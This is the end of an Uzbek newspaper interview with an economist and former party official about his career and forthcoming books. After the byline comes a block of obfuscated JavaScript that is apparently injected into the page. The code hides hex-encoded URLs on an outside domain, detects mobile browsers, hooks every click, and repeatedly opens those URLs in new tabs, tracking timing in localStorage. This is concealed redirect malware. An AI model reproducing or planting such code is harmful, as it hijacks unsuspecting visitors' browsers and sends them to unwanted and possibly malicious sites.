Hikoya qilinishicha, prezident Ruzvelt onasi vafot etgan jurnalistni yakshanba kuni kechki ovqatga taklif qilgan ekan. Yoxud boshqa safar jurnalist kechikayotganligi bois, poyezdni maʼlum muddat toʻxtatib turgan ekan. Aytmoqchimanki, biz xalqning dilidagini bilishimiz uchun, avvalo ularga yaqin boʻlishimiz kerak.
— Ayni paytda nimalar ustida ish olib borayapsiz?
— Men iqtisodchiman. Partiya ishiga oʻtish uchun Moskvaga borganimda ilmiy rahbarim, professor Yu.Ratmirovning uyida boʻlganimda, “Seni ilm bilan shugʻullanasan deb umid qilgan edim. Siyosatga bekor aralashibsan” deb meni mayin koyigan edilar. Bu aslida mening notoʻgʻri tanlagan yoʻlimmidi yoki taqdirning yozgʻiti, haligacha anglay olmayman. Biroq siyosat oʻz saroyidan haydagani bilan ilm ummoni meni hech vaqt oʻzidan uloqtirmadi. Ishdan chetlatilganimdan soʻng Moskvada doktorlik dissertatsiyamni yoqlab keldim.
Hozir esa ikkita — sheʼr va maqolalar kitobim nashrdan chiqdi. Shuningdek, yana ikkita kitob ustida ish olib boryapman. Bu — biografik ocherklar va Halima opangiz haqidagi xatlar va fikrlardan iborat kitobdir. Xudo xohlasa, bular oʻquvchilarga asl haqiqatlarni ochib beradi.
Goʻzal BEGIM suhbatlashdi.
(“Hurriyat” gazetasi)
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());